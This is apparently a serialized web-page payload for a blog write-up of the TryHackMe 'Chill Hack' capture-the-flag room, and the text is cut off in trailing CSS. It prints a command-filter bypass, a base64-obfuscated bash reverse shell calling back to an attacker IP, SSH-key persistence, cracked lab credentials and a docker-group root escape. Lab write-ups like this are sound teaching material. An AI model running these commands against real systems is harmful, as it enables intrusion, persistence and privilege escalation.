[{"data":1,"prerenderedAt":1053},["ShallowReactive",2],{"\u002F2025\u002Ftryhackme-chillhack-writeup":3,"surround-\u002F2025\u002Ftryhackme-chillhack-writeup":1044},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"recommend":6,"draft":6,"readingTime":14,"body":19,"_type":1037,"_id":1038,"_source":1039,"_file":1040,"_stem":1041,"_extension":1042,"_original_dir":1043},"\u002F2025\u002Ftryhackme-chillhack-writeup","2025",false,"","TryHackMe - Chill Hack","A step-by-step walkthrough for the TryHackMe 'Chill Hack' room. This guide covers the entire process from initial reconnaissance and exploiting a command injection vulnerability to escalating privileges to root.","2025-08-28T11:03:29.000Z","https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002Fthumbnail.jpg",[13],"CTF",{"text":15,"minutes":16,"time":17,"words":18},"4 min read",3.79,227400,758,{"type":20,"children":21,"toc":1025},"root",[22,28,44,51,55,72,76,80,84,114,118,131,135,149,153,159,180,184,197,261,265,270,274,280,287,316,320,333,337,370,401,405,425,512,517,521,527,545,549,554,558,572,576,589,593,620,624,629,633,646,668,681,720,724,753,758,762,766,771,775,787,791,796,800,812,816,829,833,838,842,878,882,886,898,902,908,952,1011,1015,1019],{"type":23,"tag":24,"props":25,"children":27},"element","pic",{"src":26},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F2.jpg",[],{"type":23,"tag":29,"props":30,"children":31},"p",{},[32,35],{"type":33,"value":34},"text","Target IP: 
",{"type":23,"tag":36,"props":37,"children":41},"a",{"href":38,"rel":39},"https:\u002F\u002Ftryhackme.com\u002Froom\u002Fchillhack",[40],"nofollow",[42],{"type":33,"value":43},"10.10.92.214",{"type":23,"tag":45,"props":46,"children":48},"h2",{"id":47},"reconnaissance",[49],{"type":33,"value":50},"Reconnaissance",{"type":23,"tag":24,"props":52,"children":54},{"src":53},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F1.jpg",[],{"type":23,"tag":29,"props":56,"children":57},{},[58,60,70],{"type":33,"value":59},"We have an FTP server with ",{"type":23,"tag":61,"props":62,"children":67},"code",{"className":63,"id":65,"style":66},[64],"example-info","just-like-this","color: #efb11d",[68],{"type":33,"value":69},"anonymous",{"type":33,"value":71}," access, one SSH server, and one web server. Let's examine these and see what we can find.",{"type":23,"tag":24,"props":73,"children":75},{"src":74},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F3.jpg",[],{"type":23,"tag":24,"props":77,"children":79},{"src":78},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F4.jpg",[],{"type":23,"tag":24,"props":81,"children":83},{"src":82},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F5.jpg",[],{"type":23,"tag":29,"props":85,"children":86},{},[87,89,96,98,104,106,112],{"type":33,"value":88},"And we find the names ",{"type":23,"tag":61,"props":90,"children":93},{"className":91,"id":65,"style":92},[64],"color: #4DFFBE",[94],{"type":33,"value":95},"Anurodh",{"type":33,"value":97}," and ",{"type":23,"tag":61,"props":99,"children":101},{"className":100,"id":65,"style":92},[64],[102],{"type":33,"value":103},"Apaar",{"type":33,"value":105}," on our 
",{"type":23,"tag":61,"props":107,"children":109},{"className":108},[],[110],{"type":33,"value":111},"ftp",{"type":33,"value":113}," server. These may be useful later on. Now let's perform a directory scan on the web server for more information.",{"type":23,"tag":24,"props":115,"children":117},{"src":116},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F6.jpg",[],{"type":23,"tag":29,"props":119,"children":120},{},[121,123,129],{"type":33,"value":122},"And we found the ",{"type":23,"tag":61,"props":124,"children":126},{"className":125,"id":65,"style":66},[64],[127],{"type":33,"value":128},"\u002Fsecret",{"type":33,"value":130}," directory.",{"type":23,"tag":24,"props":132,"children":134},{"src":133},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F7.jpg",[],{"type":23,"tag":29,"props":136,"children":137},{},[138,140,147],{"type":33,"value":139},"Now we encounter a page that examines and executes the commands we have given here. Here, we first try the ",{"type":23,"tag":61,"props":141,"children":144},{"className":142,"id":65,"style":143},[64],"color: #EA5B6F",[145],{"type":33,"value":146},"ls -la",{"type":33,"value":148}," command, and the filtering system understands us and does not carry out our operation.",{"type":23,"tag":24,"props":150,"children":152},{"src":151},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F8.jpg",[],{"type":23,"tag":45,"props":154,"children":156},{"id":155},"initial-access",[157],{"type":33,"value":158},"Initial Access",{"type":23,"tag":29,"props":160,"children":161},{},[162,164,170,172,178],{"type":33,"value":163},"Now we need to understand what kind of filtering is happening. 
Let's send the command ",{"type":23,"tag":61,"props":165,"children":167},{"className":166,"id":65,"style":92},[64],[168],{"type":33,"value":169},"ls$IFS-la",{"type":33,"value":171},", which serves the same purpose, and look at the result. Here we used $IFS (Internal Field Separator). ",{"type":23,"tag":61,"props":173,"children":175},{"className":174},[],[176],{"type":33,"value":177},"$IFS",{"type":33,"value":179}," represents characters such as space, tab, and newline in the shell.",{"type":23,"tag":24,"props":181,"children":183},{"src":182},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F9.jpg",[],{"type":23,"tag":29,"props":185,"children":186},{},[187,189,195],{"type":33,"value":188},"And our command worked. We can run commands on the system using filter bypass techniques. This shows that a filter that only blocks known command strings does not prevent command injection. So let's check whether the base64 utility exists on the target. And we found that it is installed. Then we can encode our shell with base64 using ",{"type":23,"tag":36,"props":190,"children":193},{"href":191,"rel":192},"https:\u002F\u002Fwww.revshells.com\u002F",[40],[194],{"type":33,"value":191},{"type":33,"value":196}," and then run it using filter bypass. 
As a result, our code is as follows.",{"type":23,"tag":198,"props":199,"children":203},"pre",{"className":200,"code":201,"language":202,"meta":7,"style":7},"language-bash shiki shiki-themes catppuccin-latte one-dark-pro","'e'c'h'o \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4yMS4yNTEuMTYzLzgwODAgMD4mMQ==\" | base64$IFS-d|bash\n","bash",[204],{"type":23,"tag":61,"props":205,"children":206},{"__ignoreMap":7},[207],{"type":23,"tag":208,"props":209,"children":212},"span",{"class":210,"line":211},"line",1,[213,219,224,229,234,240,246,251,256],{"type":23,"tag":208,"props":214,"children":216},{"style":215},"--shiki-default:#1E66F5;--shiki-default-font-style:italic;--shiki-dark:#61AFEF;--shiki-dark-font-style:inherit",[217],{"type":33,"value":218},"'e'",{"type":23,"tag":208,"props":220,"children":221},{"style":215},[222],{"type":33,"value":223},"c",{"type":23,"tag":208,"props":225,"children":226},{"style":215},[227],{"type":33,"value":228},"'h'",{"type":23,"tag":208,"props":230,"children":231},{"style":215},[232],{"type":33,"value":233},"o",{"type":23,"tag":208,"props":235,"children":237},{"style":236},"--shiki-default:#40A02B;--shiki-dark:#98C379",[238],{"type":33,"value":239}," \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4yMS4yNTEuMTYzLzgwODAgMD4mMQ==\"",{"type":23,"tag":208,"props":241,"children":243},{"style":242},"--shiki-default:#179299;--shiki-dark:#ABB2BF",[244],{"type":33,"value":245}," |",{"type":23,"tag":208,"props":247,"children":248},{"style":215},[249],{"type":33,"value":250}," base64$IFS-d",{"type":23,"tag":208,"props":252,"children":253},{"style":242},[254],{"type":33,"value":255},"|",{"type":23,"tag":208,"props":257,"children":258},{"style":215},[259],{"type":33,"value":260},"bash\n",{"type":23,"tag":24,"props":262,"children":264},{"src":263},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F10.jpg",[],{"type":23,"tag":29,"props":266,"children":267},{},[268],{"type":33,"value":269},"Now let's listen for the port of 
our shell on our local device and enter the command we set in the command section and press execute.",{"type":23,"tag":24,"props":271,"children":273},{"src":272},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F11.jpg",[],{"type":23,"tag":45,"props":275,"children":277},{"id":276},"privilege-escalation",[278],{"type":33,"value":279},"Privilege Escalation",{"type":23,"tag":281,"props":282,"children":284},"h3",{"id":283},"www-data-apaar",[285],{"type":33,"value":286},"www-data -> apaar",{"type":23,"tag":29,"props":288,"children":289},{},[290,292,298,300,306,308,314],{"type":33,"value":291},"With a simple command, we saw that the ",{"type":23,"tag":61,"props":293,"children":295},{"className":294},[],[296],{"type":33,"value":297},"www-data",{"type":33,"value":299}," user can run the ",{"type":23,"tag":61,"props":301,"children":303},{"className":302,"id":65,"style":92},[64],[304],{"type":33,"value":305},"\u002Fhome\u002Fapaar\u002F.helpline.sh",{"type":33,"value":307}," command with ",{"type":23,"tag":61,"props":309,"children":311},{"className":310},[],[312],{"type":33,"value":313},"apaar",{"type":33,"value":315}," privileges without needing a password.",{"type":23,"tag":24,"props":317,"children":319},{"src":318},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F12.jpg",[],{"type":23,"tag":29,"props":321,"children":322},{},[323,325,331],{"type":33,"value":324},"When we examine this file, the ",{"type":23,"tag":61,"props":326,"children":328},{"className":327,"id":65,"style":92},[64],[329],{"type":33,"value":330},"$msg 2>\u002Fdev\u002Fnull",{"type":33,"value":332}," part catches our attention. 
The script runs the contents of this variable as a command, so we can write and execute our own command here.",{"type":23,"tag":24,"props":334,"children":336},{"src":335},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F13.jpg",[],{"type":23,"tag":29,"props":338,"children":339},{},[340,342,347,349,354,356,361,363,368],{"type":33,"value":341},"So, let's run this file with ",{"type":23,"tag":61,"props":343,"children":345},{"className":344},[],[346],{"type":33,"value":313},{"type":33,"value":348}," privileges to open a ",{"type":23,"tag":61,"props":350,"children":352},{"className":351},[],[353],{"type":33,"value":202},{"type":33,"value":355}," shell, and in this way, switch from the ",{"type":23,"tag":61,"props":357,"children":359},{"className":358},[],[360],{"type":33,"value":297},{"type":33,"value":362}," user to the ",{"type":23,"tag":61,"props":364,"children":366},{"className":365},[],[367],{"type":33,"value":313},{"type":33,"value":369}," user.",{"type":23,"tag":198,"props":371,"children":373},{"className":200,"code":372,"language":202,"meta":7,"style":7},"sudo -u apaar \u002Fhome\u002Fapaar\u002F.helpline.sh\n",[374],{"type":23,"tag":61,"props":375,"children":376},{"__ignoreMap":7},[377],{"type":23,"tag":208,"props":378,"children":379},{"class":210,"line":211},[380,385,391,396],{"type":23,"tag":208,"props":381,"children":382},{"style":215},[383],{"type":33,"value":384},"sudo",{"type":23,"tag":208,"props":386,"children":388},{"style":387},"--shiki-default:#40A02B;--shiki-dark:#D19A66",[389],{"type":33,"value":390}," -u",{"type":23,"tag":208,"props":392,"children":393},{"style":236},[394],{"type":33,"value":395}," apaar",{"type":23,"tag":208,"props":397,"children":398},{"style":236},[399],{"type":33,"value":400}," 
\u002Fhome\u002Fapaar\u002F.helpline.sh\n",{"type":23,"tag":24,"props":402,"children":404},{"src":403},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F14.jpg",[],{"type":23,"tag":29,"props":406,"children":407},{},[408,410,415,417,423],{"type":33,"value":409},"For a more stable and persistent shell, let's add our own key to the ",{"type":23,"tag":61,"props":411,"children":413},{"className":412},[],[414],{"type":33,"value":313},{"type":33,"value":416}," user's ",{"type":23,"tag":61,"props":418,"children":420},{"className":419},[],[421],{"type":33,"value":422},".ssh\u002Fauthorized_keys",{"type":33,"value":424}," file.",{"type":23,"tag":426,"props":427,"children":428},{},[429,447],{"type":23,"tag":430,"props":431,"children":432},{},[433,435,441,443],{"type":33,"value":434},"Let's create a key on our own device with ",{"type":23,"tag":61,"props":436,"children":438},{"className":437},[],[439],{"type":33,"value":440},"ssh-keygen",{"type":33,"value":442},".",{"type":23,"tag":24,"props":444,"children":446},{"src":445},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F15.jpg",[],{"type":23,"tag":430,"props":448,"children":449},{},[450,452,458,460,465,466,471,473,504,508],{"type":33,"value":451},"Then, let's add our ",{"type":23,"tag":61,"props":453,"children":455},{"className":454},[],[456],{"type":33,"value":457},"apaar.pub",{"type":33,"value":459}," content to the ",{"type":23,"tag":61,"props":461,"children":463},{"className":462},[],[464],{"type":33,"value":313},{"type":33,"value":416},{"type":23,"tag":61,"props":467,"children":469},{"className":468},[],[470],{"type":33,"value":422},{"type":33,"value":472}," file on the target system with the following command.",{"type":23,"tag":198,"props":474,"children":476},{"className":200,"code":475,"language":202,"meta":7,"style":7},"echo \"ssh-ed25519 
AAAAC3NzaC1lZDI1NTE5AAAAIFutMI1FBM4G1PA27iJaJ4ABqCWFL3mch4pIvSO6hqJv xeloxa@kali\" > authorized_keys\n",[477],{"type":23,"tag":61,"props":478,"children":479},{"__ignoreMap":7},[480],{"type":23,"tag":208,"props":481,"children":482},{"class":210,"line":211},[483,489,494,499],{"type":23,"tag":208,"props":484,"children":486},{"style":485},"--shiki-default:#D20F39;--shiki-default-font-style:italic;--shiki-dark:#56B6C2;--shiki-dark-font-style:inherit",[487],{"type":33,"value":488},"echo",{"type":23,"tag":208,"props":490,"children":491},{"style":236},[492],{"type":33,"value":493}," \"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFutMI1FBM4G1PA27iJaJ4ABqCWFL3mch4pIvSO6hqJv xeloxa@kali\"",{"type":23,"tag":208,"props":495,"children":496},{"style":242},[497],{"type":33,"value":498}," >",{"type":23,"tag":208,"props":500,"children":501},{"style":236},[502],{"type":33,"value":503}," authorized_keys\n",{"type":23,"tag":24,"props":505,"children":507},{"src":506},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F16.jpg",[],{"type":23,"tag":24,"props":509,"children":511},{"src":510},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F17.jpg",[],{"type":23,"tag":29,"props":513,"children":514},{},[515],{"type":33,"value":516},"Now let's open a clean shell with our key.",{"type":23,"tag":24,"props":518,"children":520},{"src":519},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F18.jpg",[],{"type":23,"tag":281,"props":522,"children":524},{"id":523},"apaar-anurodh",[525],{"type":33,"value":526},"apaar -> anurodh",{"type":23,"tag":29,"props":528,"children":529},{},[530,532,543],{"type":33,"value":531},"Now, let's search for possible scenarios to escalate our privileges using the 
",{"type":23,"tag":36,"props":533,"children":536},{"href":534,"rel":535},"https:\u002F\u002Fgithub.com\u002Fpeass-ng\u002FPEASS-ng\u002Ftree\u002Fmaster\u002FlinPEAS",[40],[537],{"type":23,"tag":61,"props":538,"children":540},{"className":539},[],[541],{"type":33,"value":542},"linpeas.sh",{"type":33,"value":544}," tool. (I placed this script on my own apache server and downloaded it on the target with wget.)",{"type":23,"tag":24,"props":546,"children":548},{"src":547},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F19.jpg",[],{"type":23,"tag":29,"props":550,"children":551},{},[552],{"type":33,"value":553},"And some of the results caught our attention.",{"type":23,"tag":24,"props":555,"children":557},{"src":556},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F20.jpg",[],{"type":23,"tag":29,"props":559,"children":560},{},[561,563,570],{"type":33,"value":562},"The ",{"type":23,"tag":61,"props":564,"children":567},{"className":565,"id":65,"style":566},[64],"color: #77BEF0",[568],{"type":33,"value":569},"\u002Fusr\u002Fbin\u002Fdocker",{"type":33,"value":571}," software might be interesting.",{"type":23,"tag":24,"props":573,"children":575},{"src":574},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F21.jpg",[],{"type":23,"tag":29,"props":577,"children":578},{},[579,581,587],{"type":33,"value":580},"Ports that are open to localhost but closed to the internet. 
The ",{"type":23,"tag":61,"props":582,"children":584},{"className":583},[],[585],{"type":33,"value":586},"127.0.0.1",{"type":33,"value":588}," address means that this service is closed to external (internet) access and can only be reached from the server itself.",{"type":23,"tag":24,"props":590,"children":592},{"src":591},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F22.jpg",[],{"type":23,"tag":29,"props":594,"children":595},{},[596,597,603,605,611,613,619],{"type":33,"value":562},{"type":23,"tag":61,"props":598,"children":600},{"className":599},[],[601],{"type":33,"value":602},"php",{"type":33,"value":604}," files in the ",{"type":23,"tag":61,"props":606,"children":608},{"className":607,"id":65,"style":566},[64],[609],{"type":33,"value":610},"\u002Fvar\u002Fwww\u002Ffiles",{"type":33,"value":612}," path. So let's start from here. When we examine the files, we see exposed database credentials in the ",{"type":23,"tag":61,"props":614,"children":616},{"className":615,"id":65,"style":92},[64],[617],{"type":33,"value":618},"index.php",{"type":33,"value":424},{"type":23,"tag":24,"props":621,"children":623},{"src":622},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F23.jpg",[],{"type":23,"tag":29,"props":625,"children":626},{},[627],{"type":33,"value":628},"Now let's investigate the database with this information.",{"type":23,"tag":24,"props":630,"children":632},{"src":631},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F24.jpg",[],{"type":23,"tag":29,"props":634,"children":635},{},[636,638,644],{"type":33,"value":637},"And we find two users and their hashed passwords. 
Let's crack these hashes using ",{"type":23,"tag":36,"props":639,"children":642},{"href":640,"rel":641},"https:\u002F\u002Fcrackstation.net\u002F",[40],[643],{"type":33,"value":640},{"type":33,"value":645},". As a result, we get the following pairs.",{"type":23,"tag":647,"props":648,"children":649},"ul",{},[650,659],{"type":23,"tag":430,"props":651,"children":652},{},[653],{"type":23,"tag":61,"props":654,"children":656},{"className":655,"id":65,"style":92},[64],[657],{"type":33,"value":658},"anurodh:masterpassword",{"type":23,"tag":430,"props":660,"children":661},{},[662],{"type":23,"tag":61,"props":663,"children":665},{"className":664,"id":65,"style":92},[64],[666],{"type":33,"value":667},"apaar:dontaskdonttell",{"type":23,"tag":29,"props":669,"children":670},{},[671,673,679],{"type":33,"value":672},"Now we need to find the login page where we will use this information. If you recall, we previously found three ports that were only accessible locally. Now let's forward the ",{"type":23,"tag":61,"props":674,"children":676},{"className":675},[],[677],{"type":33,"value":678},"9001",{"type":33,"value":680}," port here locally with ssh.",{"type":23,"tag":198,"props":682,"children":684},{"className":200,"code":683,"language":202,"meta":7,"style":7},"ssh -L 9001:127.0.0.1:9001 -i apaar apaar@10.10.92.214\n",[685],{"type":23,"tag":61,"props":686,"children":687},{"__ignoreMap":7},[688],{"type":23,"tag":208,"props":689,"children":690},{"class":210,"line":211},[691,696,701,706,711,715],{"type":23,"tag":208,"props":692,"children":693},{"style":215},[694],{"type":33,"value":695},"ssh",{"type":23,"tag":208,"props":697,"children":698},{"style":387},[699],{"type":33,"value":700}," -L",{"type":23,"tag":208,"props":702,"children":703},{"style":236},[704],{"type":33,"value":705}," 9001:127.0.0.1:9001",{"type":23,"tag":208,"props":707,"children":708},{"style":387},[709],{"type":33,"value":710}," 
-i",{"type":23,"tag":208,"props":712,"children":713},{"style":236},[714],{"type":33,"value":395},{"type":23,"tag":208,"props":716,"children":717},{"style":236},[718],{"type":33,"value":719}," apaar@10.10.92.214\n",{"type":23,"tag":24,"props":721,"children":723},{"src":722},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F25.jpg",[],{"type":23,"tag":725,"props":726,"children":728},"alert",{"type":727},"info",[729,733],{"type":23,"tag":730,"props":731,"children":732},"template",{"v-slot:title":7},[],{"type":23,"tag":29,"props":734,"children":735},{},[736,738,743,745,751],{"type":33,"value":737},"This command allows us to securely access a service running on the remote server with the IP address ",{"type":23,"tag":61,"props":739,"children":741},{"className":740},[],[742],{"type":33,"value":43},{"type":33,"value":744}," that is only accessible from the server itself (i.e., running on ",{"type":23,"tag":61,"props":746,"children":748},{"className":747},[],[749],{"type":33,"value":750},"127.0.0.1:9001",{"type":33,"value":752},"). It will take any connection coming to port 9001 on our machine, securely transport it to the remote server, and forward it to the server's own internal port 9001.",{"type":23,"tag":29,"props":754,"children":755},{},[756],{"type":33,"value":757},"Let's check.",{"type":23,"tag":24,"props":759,"children":761},{"src":760},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F26.jpg",[],{"type":23,"tag":24,"props":763,"children":765},{"src":764},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F27.jpg",[],{"type":23,"tag":29,"props":767,"children":768},{},[769],{"type":33,"value":770},"As you can see, a web server is running on this port. 
And when we inspect it, our login page is here.",{"type":23,"tag":24,"props":772,"children":774},{"src":773},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F28.jpg",[],{"type":23,"tag":29,"props":776,"children":777},{},[778,780,785],{"type":33,"value":779},"Now let's log in with the ",{"type":23,"tag":61,"props":781,"children":783},{"className":782},[],[784],{"type":33,"value":658},{"type":33,"value":786}," information we found from the database.",{"type":23,"tag":24,"props":788,"children":790},{"src":789},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F29.jpg",[],{"type":23,"tag":29,"props":792,"children":793},{},[794],{"type":33,"value":795},"Nothing immediately stands out on the page. We examine the source code but find nothing of interest. Therefore, let's inspect the image on the site; it might be hiding something.",{"type":23,"tag":24,"props":797,"children":799},{"src":798},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F30.jpg",[],{"type":23,"tag":29,"props":801,"children":802},{},[803,805,811],{"type":33,"value":804},"Now let's download this image and check if there is data inside it with ",{"type":23,"tag":61,"props":806,"children":808},{"className":807},[],[809],{"type":33,"value":810},"steghide extract -sf \u003Cimage>",{"type":33,"value":442},{"type":23,"tag":24,"props":813,"children":815},{"src":814},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F31.jpg",[],{"type":23,"tag":29,"props":817,"children":818},{},[819,821,827],{"type":33,"value":820},"And yes, it gave us a file named ",{"type":23,"tag":61,"props":822,"children":824},{"className":823},[],[825],{"type":33,"value":826},"backup.zip",{"type":33,"value":828},". 
Now let's open this file.",{"type":23,"tag":24,"props":830,"children":832},{"src":831},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F32.jpg",[],{"type":23,"tag":29,"props":834,"children":835},{},[836],{"type":33,"value":837},"And the zip has a password. However, we can easily crack it with John the Ripper.",{"type":23,"tag":24,"props":839,"children":841},{"src":840},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F33.jpg",[],{"type":23,"tag":29,"props":843,"children":844},{},[845,847,853,855,861,863,869,871,877],{"type":33,"value":846},"And we find the password ",{"type":23,"tag":61,"props":848,"children":850},{"className":849},[],[851],{"type":33,"value":852},"pass1word",{"type":33,"value":854},". Inside the zip, we find a file named ",{"type":23,"tag":61,"props":856,"children":858},{"className":857},[],[859],{"type":33,"value":860},"source_code.php",{"type":33,"value":862},". When we examine this, we find a value encoded with ",{"type":23,"tag":61,"props":864,"children":866},{"className":865},[],[867],{"type":33,"value":868},"base64",{"type":33,"value":870}," (a reversible encoding, not a hash). 
When we decode this, we get the password for the ",{"type":23,"tag":61,"props":872,"children":874},{"className":873},[],[875],{"type":33,"value":876},"anurodh",{"type":33,"value":369},{"type":23,"tag":24,"props":879,"children":881},{"src":880},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F34.jpg",[],{"type":23,"tag":24,"props":883,"children":885},{"src":884},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F35.jpg",[],{"type":23,"tag":29,"props":887,"children":888},{},[889,891,897],{"type":33,"value":890},"Now let's switch to the anurodh user with ",{"type":23,"tag":61,"props":892,"children":894},{"className":893},[],[895],{"type":33,"value":896},"su anurodh",{"type":33,"value":442},{"type":23,"tag":24,"props":899,"children":901},{"src":900},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F36.jpg",[],{"type":23,"tag":281,"props":903,"children":905},{"id":904},"anurodh-root",[906],{"type":33,"value":907},"anurodh -> root",{"type":23,"tag":29,"props":909,"children":910},{},[911,913,918,920,926,928,933,935,941,943,950],{"type":33,"value":912},"Now, as we saw from the ",{"type":23,"tag":61,"props":914,"children":916},{"className":915},[],[917],{"type":33,"value":542},{"type":33,"value":919}," output and as we check again with the ",{"type":23,"tag":61,"props":921,"children":923},{"className":922},[],[924],{"type":33,"value":925},"id",{"type":33,"value":927}," command, the ",{"type":23,"tag":61,"props":929,"children":931},{"className":930},[],[932],{"type":33,"value":876},{"type":33,"value":934}," user is in the ",{"type":23,"tag":61,"props":936,"children":938},{"className":937},[],[939],{"type":33,"value":940},"docker",{"type":33,"value":942}," group. Membership in this group is effectively equivalent to root on the host, because members can start containers that mount the host filesystem. 
In this case, let's look at how we can escalate our privileges via ",{"type":23,"tag":36,"props":944,"children":947},{"href":945,"rel":946},"https:\u002F\u002Fgtfobins.github.io\u002Fgtfobins\u002Fdocker\u002F",[40],[948],{"type":33,"value":949},"GTFObins",{"type":33,"value":951},". After checking, we see that we can become root with the following command.",{"type":23,"tag":198,"props":953,"children":955},{"className":200,"code":954,"language":202,"meta":7,"style":7},"docker run -v \u002F:\u002Fmnt --rm -it alpine chroot \u002Fmnt sh\n",[956],{"type":23,"tag":61,"props":957,"children":958},{"__ignoreMap":7},[959],{"type":23,"tag":208,"props":960,"children":961},{"class":210,"line":211},[962,966,971,976,981,986,991,996,1001,1006],{"type":23,"tag":208,"props":963,"children":964},{"style":215},[965],{"type":33,"value":940},{"type":23,"tag":208,"props":967,"children":968},{"style":236},[969],{"type":33,"value":970}," run",{"type":23,"tag":208,"props":972,"children":973},{"style":387},[974],{"type":33,"value":975}," -v",{"type":23,"tag":208,"props":977,"children":978},{"style":236},[979],{"type":33,"value":980}," \u002F:\u002Fmnt",{"type":23,"tag":208,"props":982,"children":983},{"style":387},[984],{"type":33,"value":985}," --rm",{"type":23,"tag":208,"props":987,"children":988},{"style":387},[989],{"type":33,"value":990}," -it",{"type":23,"tag":208,"props":992,"children":993},{"style":236},[994],{"type":33,"value":995}," alpine",{"type":23,"tag":208,"props":997,"children":998},{"style":236},[999],{"type":33,"value":1000}," chroot",{"type":23,"tag":208,"props":1002,"children":1003},{"style":236},[1004],{"type":33,"value":1005}," \u002Fmnt",{"type":23,"tag":208,"props":1007,"children":1008},{"style":236},[1009],{"type":33,"value":1010}," 
sh\n",{"type":23,"tag":24,"props":1012,"children":1014},{"src":1013},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F38.jpg",[],{"type":23,"tag":24,"props":1016,"children":1018},{"src":1017},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F37.jpg",[],{"type":23,"tag":1020,"props":1021,"children":1022},"style",{},[1023],{"type":33,"value":1024},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: 
